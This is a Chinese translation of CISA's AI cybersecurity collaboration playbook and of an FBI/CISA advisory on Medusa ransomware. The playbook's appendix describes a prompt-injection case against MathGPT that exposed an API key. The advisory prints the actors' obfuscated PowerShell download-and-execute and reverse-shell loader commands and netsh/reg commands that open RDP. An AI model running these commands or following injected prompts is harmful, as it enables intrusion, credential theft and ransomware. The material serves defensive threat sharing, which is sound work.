天极按
近日,网络安全和基础设施安全局(CISA)发布了《联合网络防御协作组织人工智能网络安全协作手册》(Joint Cyber Defense Collaborative (JCDC) Artificial Intelligence (AI) Cybersecurity Collaboration Playbook)。该手册是通过 JCDC 与联邦、国际和私营部门合作伙伴共同开发的,它为人工智能社区(包括人工智能提供商、开发商和采用者)提供了关于如何自愿共享可操作事件信息的基本指导,并介绍了主动共享信息如何能够加强操作协作和提高人工智能系统的复原力。
网络安全和基础设施安全局(CISA)通过联合网络防御协作组织(JCDC)与联邦、国际和私营部门的合作伙伴合作,牵头制定了人工智能(AI)网络安全协作手册。JCDC 是 CISA 内部的一个公私协作组织,利用国会在 2021 年《国防授权法案》(NDAA)中授予的权力,联合全球网络社区共同防御网络空间。JCDC 人工智能网络安全合作手册是 2024 年举行的两次桌面演习 (TTX) 的直接成果,这两次演习汇集了联邦、行业和国际合作伙伴。第一次桌面演习于 2024 年 6 月在弗吉尼亚州雷斯顿的微软公司举行,通过应对人工智能(AI)网络安全事件带来的独特挑战奠定了基础。这项基础性工作为操作手册的早期开发提供了参考。第二次TTX 于 2024 年 9 月在加利福尼亚州旧金山的 Scale AI 总部举行,通过模拟金融服务领域的人工智能网络安全事件,帮助参与者进一步完善操作手册。CISA 将大约 150 名参与者(包括来自美国联邦机构、私营部门和国际政府组织的代表)的实时反馈纳入了游戏手册。这些演习强调了加强业务协作和信息共享的必要性,最终形成了操作手册的最终版本。
本手册向网络安全操作专业人员(包括事件响应人员、安全分析师和其他技术人员)介绍如何与 CISA 和 JCDC 合作并共享有关人工智能相关网络安全事件和漏洞的信息。
CISA 作为美国的网络防御机构和关键基础设施安全与恢复能力国家协调员,在应对人工智能特定网络安全挑战方面发挥着至关重要的作用。通过 JCDC.AI,CISA 建立了公私合作伙伴关系,以改善信息共享并制定计划,促进协调应对针对软件系统(包括人工智能系统)的网络威胁。随着人工智能越来越多地融入关键基础设施,了解并应对其独特的挑战和复杂性,对于加强对恶意网络行为者的防御至关重要。
人工智能系统依赖于数据驱动的非确定性模型,因此具有独特的复杂性,容易受到恶意网络活动的攻击,如模型中毒、数据篡改和对抗性输入。CISA 与 JCDC 合作伙伴合作,利用共享的知识和能力来对抗恶意网络行为者并加强集体应变能力。
JCDC 人工智能网络安全合作手册促进人工智能社区(包括人工智能提供商、开发商和采用者)自愿共享信息,以加强集体网络防御,应对新兴威胁。该手册旨在促进政府、行业和国际合作伙伴之间的业务合作,并将定期更新,以确保随着人工智能应用的加速,能够适应动态的威胁环境。该手册旨在:
指导 JCDC 合作伙伴如何自愿共享与人工智能系统相关的事件和漏洞信息。
概述 CISA 在收到共享信息后应采取的行动。
促进联邦机构、私营企业、国际合作伙伴和其他利益相关者之间的合作,以提高对人工智能网络安全风险的认识,并提高人工智能系统的复原力。
虽然该手册侧重于加强联合反恐委员会内部的合作,但也定义了适用于其他信息共享机制的关键信息类别(附录 C),如信息共享和分析中心(ISAC)。CISA 鼓励各组织采用该操作手册的指导意见来加强自身的信息共享实践,从而有助于采用统一的方法来应对关键基础设施中与人工智能相关的威胁。
JCDC 人工智能网络安全协作手册纳入了关键立法和技术框架中的定义,为应对人工智能网络安全挑战奠定了基础。
人工智能系统: 基于机器的系统,针对人类定义的特定目标,做出影响真实或虚拟环境的预测、建议或决策。这些人工智能系统使用基于机器和人类的输入来感知环境,通过自动分析将这些感知抽象为模型,并使用模型推理来提供信息或行动选项。
事件: “事件 “一词是指未经合法授权而实际或即将危及信息系统信息的完整性、保密性或可用性,或未经合法授权而实际或即将危及信息系统的事件。
根据这些定义,CISA 制定了人工智能网络安全事件的工作定义:“未经合法授权,实际或即将危及人工智能系统、人工智能系统启用和/或创建的任何其他系统或存储在任何这些系统上的信息的保密性、完整性或可用性的事件"。
网络安全事件通常源于软件或系统中的漏洞。美国国家标准与技术研究院(NIST)将漏洞定义为 “信息系统、系统安全程序、内部控制或实施中可能被威胁源利用或触发的弱点”,是人工智能系统网络安全的核心。该手册还有助于协调披露关键基础设施中与人工智能系统相关的漏洞。
通过 JCDC 共享信息,公司可从加强协调和政府支持中获益,并获得在可信环境中就人工智能网络安全问题进行合作的能力。JCDC 为关键基础设施部门的重要网络安全问题提供了沟通机制,使企业能够讨论和应对人工智能网络安全方面的共同挑战。JCDC 的召集能力可帮助企业获得有价值的威胁情报、缓解策略和协作性网络安全环境。
通过共享信息,JCDC 加快了对网络威胁的协调响应,并帮助政府合作伙伴收集必要信息,以确定是否应启动国家事件响应机制。此外,JCDC 还制作和分发相关的网络威胁情报、漏洞管理见解和缓解策略,使公司能够更好地管理和消除新出现的威胁。
《网络安全信息共享法案(2015)》(CISA 2015)为非联邦实体提供了保护,使其可以按照特定要求与政府共享网络威胁指标和网络安全防御措施,并规定尽管有任何其他法律,它们也可以这样做。这些保护措施包括不放弃特权、保护专有信息、免于根据《信息自由法》(FOIA)进行披露、禁止在监管执法中使用等。《网络安全信息共享法案(2015)》还要求国土安全部具备与联邦政府和私营部门实体共享网络威胁指标的能力和流程,并为通过该流程共享的信息提供责任保护。该法规还为按照法定要求与州、地方、部落和领地 (SLTT) 实体共享的网络威胁指标和防御措施制定了保护措施,包括根据 SLTT 信息自由法,这些信息免于披露。《网络安全信息共享法案(2015)》不涵盖法律规定的非网络威胁指标或防御措施的共享信息。与人工智能相关的信息只要符合网络威胁指标或防御措施的条件,就属于该法的管辖范围。
CISA 制定了管理和保护 JCDC 合作伙伴共享数据的流程。
CISA 利用交通灯协议 (TLP) 作为其主要的传播控制标记系统。JCDC 内部通过电子邮件共享的所有数据均应明确标注相关的 TLP 名称。同样,其他利益相关者也可通过电子邮件与 JCDC 共享信息,CISA.JCDC@cisa.dhs.gov,并遵循 TLP 标记系统。某些 TLP 标记要求在向组织外传播前获得信息来源的许可。所有组织都应在分享前寻求适当的许可。下文 “主动信息共享 ”和 “关于事件或漏洞的信息共享 ”部分提供了有关与 JCDC 共享的有价值信息类型的更多指导。
有时,JCDC 合作伙伴可能希望在不注明出处的情况下共享信息。在这种情况下,这些合作伙伴可直接与 CISA 共享,由 CISA 在不注明出处的情况下继续共享。合作伙伴在与 CISA 共享信息时,应提供有关如何处理其信息的详细说明,并指定信息使用的任何限制(如清单 1 所述)。 有了这些保障措施和协议,CISA 可在 JCDC 内部营造一个共享关键网络安全信息的安全环境,鼓励积极参与并保护敏感数据。附录 A 提供了表 1 的填充示例。
表 1:信息处理限制与背景
要报告新发现的产品和服务中的网络安全漏洞,JCDC 合作伙伴应使用 CISA 的协调漏洞披露流程。合作伙伴可通过 CISA 协调漏洞披露页面上的 “报告漏洞 ”链接安全地提交漏洞。如果 JCDC 合作伙伴对此流程有疑问或担忧,请联系 JCDC 代表。该代表可将合作伙伴与 CISA 漏洞管理人员联系起来。
其他需要考虑的漏洞协调最佳实践:
制定并实施漏洞披露政策 (VDP),以便安全研究人员和其他人员了解哪些类型的测试可用于哪些系统,以及向何处发送漏洞报告。有关 CISA 与联邦机构共享的 VDP 示例,请参阅 Binding Operational Directive 20-01。联合数据中心合作伙伴应酌情修改 VDP 模板。
如果在 JCDC 合作伙伴运营的系统中发现漏洞,各实体应按照该合作伙伴的 VDP,根据其特定指南报告问题。
如果 JCDC 合作伙伴发现已部署的联邦政府系统中存在漏洞,则应按照其 VDP 中的要求通知系统所有者。作为最后手段,可通过卡内基梅隆大学软件工程研究所 (SEI) CERT 协调中心向 CISA 报告这些问题。
要报告事件,JCDC 合作伙伴应使用 CISA 的自愿网络事件报告门户。报告实体应在表格中提供的解释性文本框中描述事件中与人工智能相关的任何方面。
JCDC 强烈鼓励合作伙伴尽早主动共享人工智能网络安全事件或漏洞的可操作信息。鉴于人工智能系统的复杂性以及在识别安全问题及其根源方面的挑战,JCDC 合作伙伴应持续、主动地共享有关恶意活动、趋势、发布前出版物和评估的关键信息。持续的信息共享可使所有合作伙伴保持对不断变化的环境的态势感知,从而实现对关键威胁的早期检测、识别和修复。通过建立一个信息灵通、相互协作的网络防御网络,JCDC 加强了对所有关键基础设施部门的人工智能系统的保护和恢复能力。
表 1 所列的主动信息共享类别有助于 CISA 和 JCDC 合作伙伴评估已观察到的相关信息,了解行动环境的复杂性,并就潜在的防御行动做出明智决策。另请参阅附录 B,了解鼓励合作伙伴主动共享信息的事件示例。
表 1:主动信息类别
JCDC 合作伙伴应表2,自愿共享有关人工智能网络安全事件或漏洞的信息。其他利益相关方可通过电子邮件与 JCDC 共享自愿信息,电子邮件地址为 CISA.JCDC@cisa.dhs.gov。该核对表有助于突出可操作的数据,以简化 JCDC 与合作伙伴之间的共享流程。附录 A 提供了表2 的填充示例。 JCDC 鼓励合作伙伴遵循核对表,同时也欢迎共享任何相关信息,即使未满足核对表的所有要点。
此外,使用网络表格自愿报告事件或产品或服务中的漏洞是通过加密渠道向 CISA 提供所有相关信息的好方法。如果使用网络表格,JCDC 合作伙伴应通过电子邮件通知 JCDC 代表。
表 2:主动信息共享
图 1:CISA集体行动方法
作为从 JCDC合作伙伴收集信息的中心枢纽,CISA管理和协调所需的集体行动(见图1)。当 CISA收到有关网络安全事件或漏洞(包括人工智能特有的事件或漏洞)的信息时,它首先会将信息输入中央跟踪平台进行汇总和验证。在此阶段,CISA会删除任何可能不构成威胁的合法或良性指标,并确保从数据集中删除任何可识别受害者身份的信息,以保护隐私。
接下来,CISA继续分析和丰富数据。这包括确认指标是否与特定合作伙伴(如云服务提供商或互联网服务提供商)相关,以酌情促进协调。可利用CISA 现有数据进一步丰富信息。CISA会进行额外的分析,通过透视相关信息来获取更多见解。
然后,CISA可考虑进行内部和外部协调,根据共享的信息采取适当的防御行动。收集、匿名和丰富的指标可输入入侵检测系统,以保护联邦文职行政部门(FCEB)机构、州、地方、部落和领土(SLTT)实体以及关键基础设施资产。在某些情况下,可为联邦文职行政机构实施域块,以应对威胁。
如其 TLP级别所示,信息还可与行业、美国联邦政府、SLTT和国际合作伙伴共享,以支持网络防御目的。在共享信息的过程中,JCDC合作伙伴可能会获得并进一步分享更多的见解,从而在所有相关合作伙伴之间形成多向信息流。这种丰富的信息流可促成分析交流、公共网络安全咨询(与JCDC 合作伙伴协调)以及更广泛的跨部门合作,共同应对网络威胁。
图 3:CISA信息共享与协作流程
加强协调涉及在常规操作无法完全解决或理解网络安全问题时加强信息共享和扩大合作。在这种情况下,CISA和 JCDC合作伙伴可选择实施额外机制并增加沟通频率,以改进事件响应和补救工作。这些活动都是自愿的,并根据情况按需启动。
CISA 对合作伙伴共享的信息进行评估,决定采取何种行动,并根据情况的变化调整加强协调的程度。CISA在很大程度上依赖于与JCDC 合作伙伴的合作,以评估哪些事件值得进一步分析并确定加强协调的优先次序。附录B 中详述的PyTorch 依赖链受损事件就是一个需要加强协调的活动实例。
信息共享有助于 CISA采取各种有针对性的行动来加强网络安全。这些行动可以单独执行,也可以合并执行,具体取决于已识别威胁或漏洞的性质。这一过程本身是动态的,涉及多个利益相关者之间的合作,通常是同时进行的。CISA采用灵活、综合的方法,根据不断变化的威胁情况调整应对措施,包括但不限于:
为检测和预防目的共享信息: 在美国政府机构、私营部门、SLTT、关键基础设施和国际合作伙伴之间传播关键威胁情报,以加强集体网络安全工作。
揭露并瓦解对手的战术和基础设施: 通过公共网络安全咨询、TLP:CLEAR 或 TLP:GREEN 报告或小组共享,揭露并潜在地降低对手使用的战术、技术和基础设施所带来的风险。
协调应对恶意基础设施的战略: 与相关合作伙伴合作,识别网络攻击中使用的由对手控制的基础设施,并制定有效的缓解策略。
识别并通知受害实体: 识别受网络事件影响或可能受网络事件影响的组织,并及时发出警报,以便迅速采取保护措施。
共享检测能力: 为 JCDC 合作伙伴提供策略,以提高其识别和缓解自身网络中的网络威胁的能力。
制作和分发相关的威胁情报产品: 创建可操作的产品,如威胁咨询和情报报告,其中包括分析、缓解建议和当前威胁状况的更新。
提供主动服务和参与: 主动与合作伙伴接触,提供量身定制的建议、漏洞管理策略和最佳实践,以便在事件发生前加强防御。
通过响应式参与评估不断变化的威胁: 促进实时响应参与,如电话和协调会议,以帮助合作伙伴更好地了解威胁环境,并确定适当的下一步措施。这有助于确保合作伙伴了解预期的行动以及如何有效应对。
作为加强协调的一部分,JCDC与联邦政府合作伙伴密切合作,对重大人工智能网络安全问题做出统一回应。通过这种合作,联邦政府的能力得到了统一,确保在应对重大威胁或漏洞时考虑到所有可用资源和专业知识。与联邦政府合作伙伴协调有助于确保CISA 和 JCDC采取的行动与更广泛的政府工作相辅相成,从而加强事件响应和补救战略的整体有效性。
JCDC人工智能网络安全合作手册为人工智能社区(包括人工智能提供商、开发商和采用者)自愿共享信息提供了重要指导,以加强集体防御,应对不断变化的网络威胁。随着人工智能应用的加速,人工智能系统的威胁范围不断扩大,带来了新的漏洞和安全挑战。本手册将定期更新,通过政府、行业和国际合作伙伴之间的积极合作来应对这些挑战。
JCDC 合作伙伴应将该手册纳入其事件响应和信息共享流程,根据需要进行迭代改进,并提供反馈。请参阅 “问题与反馈 ”部分的说明。通过持续的合作和实际应用,这种持续的投入可加强和调整该手册。
为加强合作与参与,JCDC邀请人工智能安全专家和利益相关者考虑采取以下行动:
标记技术交流机会: JCDC 合作伙伴应确定并分享与影响人工智能界的新兴威胁、对手或漏洞相关的技术交流机会。这些交流可提供重要的见解,使 JCDC 和 CISA 能够积极应对共同的风险。
确定人工智能界的优先问题: 突出关键问题和风险有助于确保 JCDC 的优先事项与人工智能界确定的最紧迫挑战保持一致。这种一致性有助于更有针对性、更有效地满足关键的人工智能安全需求。
促进事后分析和知识共享: 在社区内开发和共享事后分析、案例研究和教育内容,可促进积极主动地应对人工智能安全挑战。分享经验教训可加强集体应变能力,提高应对未来事件的准备程度。
成为 JCDC 合作伙伴: 加入由来自全球各组织的网络防御者组成的多元化团队,该团队致力于主动收集、分析和共享可操作的网络风险信息,以实现同步的网络安全规划、网络防御和响应。要了解有关 JCDC 的更多信息,请访问 CISA 的 JCDC 网页并发送电子邮件至 CISA.JCDC@cisa.dhs.gov。
通过人工智能社区的积极参与,该手册将成为应对未来人工智能安全形势的动态资源。随着关键基础设施所有者和运营商越来越多地使用人工智能工具,业务合作在加强网络安全和推进人工智能技术的安全应用方面发挥着至关重要的作用。
以下是基于 2023年 1 月提交给MITRE ATLAS 的真实案例研究 “通过提示注入在 MathGPT 中执行代码 ”的自愿信息共享核对表填写示例。该事件涉及一名行为者利用提示注入漏洞访问应用程序主机系统的环境变量和GPT-3 API 密钥。利用这一访问权限,该行为者对MathGPT 执行了拒绝服务(DoS)攻击,MathGPT是一个采用 GPT-3语言模型回答用户生成的数学问题的公共应用程序。该攻击还可能耗尽应用程序的API 查询预算或完全中断其运行。
尽管 MathGPT团队后来已经缓解了此次事件中发现的漏洞,但本案例研究仍被用于填充自愿信息共享清单。本示例以MathGPT 开发人员在检测到攻击后不久对攻击做出响应的视角编写,就像事件仍在活动一样。
为了说明现实世界中的威胁行为者在日常操作中可能会使用哪些方法来利用人工智能系统,以及这些技术与传统的网络入侵有何不同,我们研究了MITRE ATLAS 关于Clearview AI 配置错误的案例研究。
Clearview AI 开发了一种面部识别工具,可在公开照片数据库(如Facebook、谷歌和YouTube)中搜索匹配的照片。该工具已被执法机构和其他实体用于调查目的。
然而,Clearview AI 的源代码库虽然有密码保护,但配置不当,允许任意用户创建账户。这一漏洞使外部研究人员能够访问包含Clearview AI 生产凭证、云存储桶密钥(包含70K 视频样本)、应用程序副本和Slack 标记的私有代码库。
通过访问这些训练数据和凭证,恶意行为者可以破坏未来的应用程序版本,导致部署模型中的面部识别功能降低或被恶意破坏。这一案例突出表明,需要以超越传统网络安全措施的方式确保人工智能系统的安全。此类系统不仅需要稳健的卫生措施,如强制执行最小权限访问、多因素身份验证以及严格的监控和审计,还需要针对人工智能技术带来的独特风险量身定制特定的保障措施。
在本案例中,安全研究人员通过对抗性方法展示了Clearview AI 系统中的漏洞,详情如下:
策略: 资源开发
o技巧: 建立账户
一名安全研究人员通过错误配置的服务器设置初步访问了Clearview AI 的私有代码库,该设置允许任意用户注册有效账户。
战术:收集
o技术:从信息库获取数据
私人代码库包含用于访问AWS S3 云存储桶的凭据,从而发现了面部识别工具的资产,包括
o已发布的桌面和移动应用程序。
o具有新功能的预发布应用程序。
o Slack 访问令牌。
o原始视频和其他数据
策略:资源开发
o技术: 获取公共 ML人工制品
对手可以下载训练数据,并从源代码和反编译应用程序二进制文件中收集有关软件、模型和功能的详细信息。
战术:影响
o技术: 侵蚀 ML模型完整性
由于访问了这些信息,敌方可能通过降低或恶意操纵面部识别能力来破坏未来发布的 应用程序。
为了说明在非例行或临时信息共享不足的情况下,增强协调情景下可能发生的过程,我们研究了MITRE ATLAS 的另一个案例研究:“PyTorch依赖链受损”。
在此案例中,一伙身份不明的恶意行为者通过破坏与PyTorch 预发布版本相关的Linux 软件包,实施了一次供应链攻击。15他们将恶意二进制文件上传到代码库,该二进制文件与合法的PyTorch 依赖程序同名。结果,PyPI软件包管理器(pip)无意中安装了恶意软件包,而不是正版软件包。这种被称为 “依赖关系混淆 ”的技术暴露了使用受影响的 pip安装版本软件包的 Linux机器上的敏感信息。
攻击通过以下步骤展开,详情如下:
战术:初始访问
o 技术: ML供应链破坏 - ML 软件
一个名为 torchtriton的恶意依赖包被上传到PyPI 代码库,其软件包名称与以PyTorch-nightly命名的软件包相同。行为者利用系统中现有的优先级规则,诱骗用户下载恶意软件包,而不是合法软件包。恶意软件包包含附加代码,可上传从安装该软件包的机器上获取的敏感数据。
战术:收集
o技术:从本地系统获取数据
恶意软件包调查受影响系统,以获取IP 地址和用户名等基本指纹信息以及其他敏感数据。
战术:渗透
o技术:通过网络手段渗透
所有收集到的信息(包括文件内容)都通过加密域名系统查询上传到外部网域。
MITRE ATLAS 网站上有一份完整的TTPs 演变清单,威胁者可能会使用这些TTPs 来攻击人工智能系统,这些TTPs 是由人工智能安全社区共享的真实世界攻击和现实红队演习提供的。
遭遇人工智能网络安全事件的组织可通过多种自愿渠道向联邦政府通报事件,以请求技术援助、报告犯罪或参与业务合作。人工智能社区还开发和部署了更多自愿共享信息的非正式机制,以促进社区对前沿人工智能事件的认识和讨论。除了本手册中描述的联系CISA 的方法外,各组织还应考虑以下选项。
以下文件提供了组织可参考的其他信息资源,以了解人工智能系统的网络安全。
天极按
近日,美国联邦调查局(FBI)、网络安全和基础设施安全局 (CISA) 以及多州信息共享和分析中心 (MS-ISAC) 发布本联合公告,以传播已知的美杜莎(Medusa )勒索软件TTP 和 IOC,这些 TTP 和 IOC 是联邦调查局在 2025 年 2 月的调查中发现的。
Medusa 是一种勒索软件即服务(RaaS) 变种,最早发现于2021 年 6月。截至 2025年 2 月,Medusa的开发者和附属机构已经影响了300多名受害者,他们来自多个关键基础设施部门,受影响的行业包括医疗、教育、法律、保险、技术和制造。根据联邦调查局的调查,Medusa勒索软件变种与MedusaLocker变种和Medusa移动恶意软件变种无关。
从2021 年至今,RaaS Medusa 变种一直被用于实施勒索软件攻击。Medusa最初是作为一个封闭的勒索软件变种运行的,这意味着所有开发和相关操作都由同一组网络威胁行为者控制。虽然Medusa后来发展为使用联盟模式,但赎金谈判等重要操作仍由开发者集中控制。Medusa开发人员和附属人员,在本报告中称为 “Medusa行为者”都采用双重勒索模式,即加密受害者数据,并威胁如果不支付赎金,就公开发布外泄数据。
美杜莎开发者通常会在网络犯罪论坛和市场上招募初始访问经纪人(IAB),以获得潜在受害者的初始访问权限[TA0001]。向这些联盟提供的潜在报酬在100 美元到100万美元之间,并有机会专门为美杜莎工作。据了解,Medusa IAB(联属会员)会使用一些常见的技术,如:
将网络钓鱼活动作为窃取受害者凭证的主要方法 [T1566]。
通过常见漏洞和暴露(CVE)利用未修补的软件漏洞 [T1190],如 ScreenConnect 漏洞 CVE-2024-1709 [CWE-288:使用替代路径或通道绕过验证] 和 Fortinet EMS SQL 注入漏洞 [CVE-2023-48788 [CWE89:SQL 注入]。
美杜莎行动者使用 “离岸生活”(LOTL)和合法工具 “高级 IP 扫描仪 ”和 “SoftPerfect网络扫描仪 ”进行初始用户、系统和网络枚举。一旦在受害者网络中建立了立足点,通常扫描的端口包括
21 (FTP)
22 (SSH)
23 (Telnet)
80 (HTTP)
115 (SFTP)
443 (HTTPS)
1433 (SQL 数据库)
3050 (Firebird 数据库)
3128(HTTP 网络代理)
3306 (MySQL 数据库)
3389 (RDP)
Medusa行动者主要使用PowerShell [T1059.001]和Windows 命令提示符(cmd.exe) [T1059.003]进行网络[T1046] 和文件系统枚举[T1083],并利用导入工具传输功能[T1105]。Medusa行为体使用Windows Management Instrumentation (WMI) [T1047] 查询系统信息。
美杜莎行动者使用LOTL 逃避检测[TA0005]。Certutil(certutil.exe)用于在执行文件侵入时躲避检测。
已观察到行为者使用几种不同的PowerShell检测规避技术,其复杂程度不断增加,具体如下。此外,Medusa行为者还试图通过删除PowerShell命令行历史记录来掩盖其踪迹[T1070.003]。
在本例中,Medusa行为者使用了一种众所周知的规避技术,即使用特定执行设置执行base64 加密命令[T1027.013]。
powershell -exec bypass -enc
在另一个示例中,通过将DownloadFile字符串切成片段并通过变量[T1027] 引用它来混淆它。
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; InvokeExpression (New-Object Net.WebClient).$x.Invoke(http:///.msi)
在最后一个示例中,有效负载是一个经过混淆的base64 字符串,它被读入内存,经gzip解压缩后用于创建scriptblock。使用空字符串和连接来分割base64 有效负载,并使用格式运算符(-f) 和三个参数来指定base64 有效负载中的字符替换。
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((
New-Object System.IO.StreamReader(
New-Object System.IO.Compression.GzipStream((
New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
(('<base64 payload string>')-f'<character replacement 0>','<character
replacement 1>', '<character replacement')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
经过混淆的base64 PowerShell有效载荷与powerfun.ps1完全相同,后者是一个公开可用的暂存器脚本,可通过TLS创建反向或绑定外壳以加载附加模块。在绑定外壳中,脚本等待本地端口443 [T1071.001]的连接,并在反向外壳中启动与远程端口443 的连接。
在某些情况下,美杜莎行动者试图使用易受攻击或已签名的驱动程序来杀死或删除端点检测和响应(EDR)工具[T1562.001]。
联邦调查局观察到美杜莎行动者使用以下工具支持指挥和控制(C2) 并逃避检测:
Ligolo.
o一种反向隧道工具,通常用于在被入侵主机和威胁行为者的机器之间创建安全连接。
Cloudflared。
o前身为ArgoTunnel。
o用于通过Cloudflare Tunnel将应用程序、服务或服务器安全地暴露在互联网上,而不直接暴露它们。
美杜莎行动者使用各种合法远程访问软件[T1219];他们可能会根据受害者环境中已有的任何远程访问工具来调整自己的选择,以此作为逃避检测的手段。调查发现,Medusa行为者使用AnyDesk、Atera、ConnectWise、eHorus、N-able、PDQ Deploy、PDQ Inventory、SimpleHelp和Splashtop等远程访问软件。梅杜莎使用这些工具,结合远程桌面协议(RDP)[T1021.001]和PsExec [T1569.002],在网络中横向移动[TA0008],并识别文件以进行外渗[TA0010]和加密[T1486]。当获得有效的用户名和密码凭据时,Medusa行动者会使用PsExec 进行以下操作:
Copy (-c) 当前计算机上各种批脚本中的一个脚本到远程计算机,并以SYSTEM 级权限 (-s) 执行。
在远程机器上以 SYSTEM 级权限执行一个已经存在的本地文件。
使用cmd /c 执行远程 shell 命令。
PsExec执行的批脚本之一是openrdp.bat,它首先会创建一条新的防火墙规则,以允许3389 端口的入站TCP 流量:
netsh advfirewall firewall add rule name=“rdp” dir=in protocol= tcp localport=3389 action=allow
然后,创建允许远程WMI 连接的规则:
netsh advfirewall firewall set rule group=“windows management instrumentation (wmi)” new enable=yes
最后,修改注册表以允许远程桌面连接:
reg add “HKLMSYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
还观察到Mimikatz被用于本地安全授权子系统服务(LSASS)转储[T1003.001],以获取凭证[TA0006] 并帮助横向移动。
美杜莎行动者安装并使用Rclone,以便将数据外泄到行动者和附属机构使用的美杜莎C2 服务器[T1567.002]。行动者使用Sysinternals PsExec、PDQ Deploy 或BigFix [T1072]在全网文件上部署加密程序gaze.exe,并在特定目标上禁用Windows Defender和其他防病毒服务。加密文件的扩展名为.medusa 文件。进程gaze.exe会终止所有与备份、安全、数据库、通信、文件共享和网站相关的服务[T1489],然后删除阴影副本[T1490] 并使用AES-256加密文件,然后再丢弃赎金条。然后,黑客会手动关闭[T1529]和加密虚拟机,并删除它们之前安装的工具[T1070]。
Medusa RaaS 采用双重勒索模式,受害者必须支付[T1657]才能解密文件并阻止进一步发布。赎金条要求受害者在48 小时内通过基于Tor浏览器的即时聊天工具或端到端加密即时信息平台Tox进行联系。如果受害者不回复赎金条,Medusa的行为者将直接通过电话或电子邮件联系受害者。梅杜萨运营着一个.onion数据泄露网站,在发布信息倒计时的同时泄露受害者信息。赎金要求发布在网站上,并直接超链接到Medusa的附属加密货币钱包。在这一阶段,Medusa同时还宣传在倒计时结束前向感兴趣的人出售数据。受害者还可以额外支付10,000美元的加密货币,以增加一天的倒计时时间。
联邦调查局的调查发现,一名受害者在支付赎金后,另一名美杜莎行为者与他联系,声称谈判代表窃取了已支付的赎金金额,并要求再次支付一半的赎金以提供 “真正的解密器”这可能表明这是一个三重勒索计划。
表1 列出了调查过程中获得的恶意文件哈希值。
表1:恶意文件
表2列出了美杜莎行为者用于勒索受害者的电子邮件地址;这些地址专门用于勒索赎金谈判,并在受害者受到攻击后与受害者联系。这些电子邮件地址与Medusa 行为者实施的网络钓鱼活动无关。
表2:Medusa电子邮件地址
请参见表3 - 表11,了解本报告中提及的所有威胁行为体战术和技术。
表3:初始访问
表4:防御规避
表5:发现
表6:凭证访问
表7:横向移动和执行
表8:渗透和加密
表9:指挥和控制
表10:持久性
表11:影响
联邦调查局、CISA和MS-ISAC建议各组织实施以下缓解措施,以根据威胁行为者的活动改善网络安全态势。这些缓解措施与CISA 和国家标准与技术研究院(NIST) 制定的跨部门网络安全绩效目标(CPG) 相一致。CPGs提供了一套CISA 和NIST 建议所有组织实施的最低实践和保护措施。CISA和NIST 以现有网络安全框架和指南为基础,制定了CPGs,以防范最常见、影响最大的威胁、战术、技术和程序。请访问CISA 的CPGs 网页,了解有关CPGs 的更多信息,包括其他建议的基准保护措施。
实施恢复计划,在物理上独立、分割和安全的位置(如硬盘、存储设备、云)维护和保留敏感或专有数据和服务器的多个副本[CPG 2.F、2.R、2.S]。
要求所有使用密码登录的账户(如服务账户、管理员账户和域管理员账户)遵守 NIST 的标准。特别是要求员工使用长密码,并考虑不要求频繁更换密码,因为这样会削弱安全性[CPG 2.C]。
尽可能要求对所有服务进行多因素身份验证,特别是网络邮件、虚拟专用网络和访问关键系统的账户[CPG 2.H]。
及时更新所有操作系统、软件和固件。及时打补丁是组织最大限度减少网络安全威胁的最有效、最具成本效益的步骤之一。优先修补面向互联网系统的已知漏洞[CPG 1.E]。
细分网络以防止勒索软件的传播。网络分段可通过控制不同子网之间的流量和访问,以及限制对手的横向移动来防止勒索软件的传播 [CPG 2.F]。
使用网络监控工具识别、检测和调查异常活动以及对所指出的勒索软件的潜在穿越。为帮助检测勒索软件,实施一种工具,记录并报告所有网络流量,包括网络上的横向移动活动。端点检测和响应 (EDR) 工具对检测横向连接特别有用,因为它们可以深入了解每台主机的常见和不常见网络连接 [CPG 3.A]。
要求使用 VPN 或跳转主机进行远程访问。
监控未经授权的扫描和访问尝试。
通过阻止未知或不受信任的来源访问内部系统的远程服务来过滤网络流量。这可防止威胁行为者直接连接到他们为持久性而建立的远程访问服务。
审计具有管理权限的用户账户,并根据最小特权原则配置访问控制[CPG 2.E]。
审查域控制器、服务器、工作站和活动目录中的新账户和/或未识别账户 [CPG 1.A, 2.O]。
禁用命令行和脚本活动及权限。权限升级和横向移动通常依赖于从命令行运行的软件工具。如果威胁行动者无法运行这些工具,他们将很难提升权限和/或横向移动[CPG 2.E、2.N]。
禁用未使用的端口 [CPG 2.V]。
对数据进行离线备份,并定期进行备份和恢复[CPG 2.R]。通过采用这种做法,组织可帮助确保不会出现严重的数据中断和/或只有无法恢复的数据。
确保所有备份数据都经过加密、不可更改(即无法更改或删除),并涵盖整个组织的数据基础设施[CPG 2.K、2.L、2.R]。
除了采用缓解措施外,FBI、CISA和MS-ISAC 还建议针对本建议中映射到MITRE ATT&CK Matrix for Enterprise 框架的威胁行为,对贵组织的安全计划进行演练、测试和验证。联邦调查局、CISA和MS-ISAC建议测试您现有的安全控制清单,以评估它们在与本建议中描述的ATT&CK 技术相对照时的表现。
1.选择本公告中描述的ATT&CK 技术(表3 至表11)。
2.根据该技术调整您的安全技术。
3.根据技术测试您的技术。
4.分析检测和预防技术的性能。
5.对所有安全技术重复上述过程,以获得一组全面的性能数据。
6.根据此流程生成的数据,调整您的安全计划,包括人员、流程和技术。
联邦调查局、CISA和MS-ISAC建议继续在生产环境中大规模测试您的安全计划,以确保针对本建议中确定的MITRE ATT&CK 技术实现最佳性能。
天极智库聚焦网络安全相关领域,聚集网络安全职能部门、行业主管部门、科研院所、相关企业和专家学者的力量,组织开展政策研判、事件分析、技术研究、学术交流,为国家网络安全工作提供支撑,增强国家网络空间安全防御能力,提升国家关键信息基础设施安全保障能力和水平。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...